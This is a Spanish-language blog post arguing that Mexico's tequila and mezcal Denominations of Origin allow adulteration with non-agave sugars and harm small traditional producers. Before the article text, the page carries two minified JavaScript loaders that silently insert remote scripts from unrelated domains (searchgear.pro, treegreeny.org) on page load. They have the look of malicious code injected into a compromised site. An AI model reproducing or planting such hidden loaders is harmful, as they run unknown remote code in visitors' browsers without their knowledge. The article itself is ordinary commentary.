;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 110. Denominaciones de Origen: destructoras del tequila y del mezcal

110. Denominaciones de Origen: destructoras del tequila y del mezcal


Las Denominaciones de Origen Mezcal y Tequila no sólo son una farsa: propician la destrucción de las bebidas que dicen proteger y despojan a sus legítimos propietarios que las han elaborado y consumido por siglos. Consecuencia de ello es que los mexicanos estamos en riesgo de perder un Patrimonio Cultural Inmaterial (PCI) invaluable por reglamentaciones basadas en la ignorancia, en la irresponsabilidad institucional y en la protección de intereses que nada tienen que ver con la tradición mezcalera.
Van algunas pruebas:
El “tequila” puede elaborarse hasta con 49% de azúcares diferentes a los del agave: caña, remolacha, betabel o fructuosa. Quienes fabrican el bebedizo no están obligados a informar la procedencia de los mismos. La norma del tequila permite adicionar glicerina (para que no raspe el gañote); esencia de encino, colorantes y saborizantes (para simular barrica). Esta adulteración y engaño al consumidor ¡se hace desde 1964!, cuando se permitió -en la norma- adicionar hasta 30% de azúcares diferentes a los del agave.
El caso del mezcal da risa: en la Denominación de Origen se acepta la adulteración al permitir la adición de 40% de azúcares diferentes a los del agave; y, en la esquizofrenia pura, su norma oficial sólo permite adicionar ¡20% de azúcares diferentes a los del agave! ¿Alguien puede explicar ésto? Y ya ha habido iniciativas de particulares y de senadores de la República para que pueda hacerse igual que tequila: 49% de azúcares diferentes a los del agave.
Tales reglamentaciones adulteradoras están hechas para monopolizar la producción y comercialización, y así eliminar a los pequeños productores de mezcales tradicionales (MT), verdaderas maravillas gastronómicas y culturales que tienen tras de sí enorme conocimiento, diversidad biológica, regiones culturales, economías, gustos históricos, gastronomías y paladares formados a través de siglos.
¿Qué sentido tuvo lograr que la Cocina Tradicional Mexicana fuese declarada PCI si ahora se intenta destruir los MT?

http://impreso.milenio.com/node/9094774

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *